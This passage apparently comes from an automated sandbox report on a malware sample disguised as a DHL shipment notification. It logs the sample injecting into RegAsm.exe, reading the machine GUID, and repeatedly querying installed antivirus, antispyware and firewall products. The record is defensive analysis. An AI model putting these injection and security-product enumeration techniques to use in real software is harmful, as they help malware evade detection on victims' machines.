        Source: C:\Users\user\Driftigt\Rotacism6.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: D00000
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: RegAsm.exe, 00000013.00000003.1544463193.0000000000D37000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RegAsm.exe, 00000013.00000003.1361474149.0000000020762000.00000004.00000001.sdmpBinary or memory string: Program Manager|
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
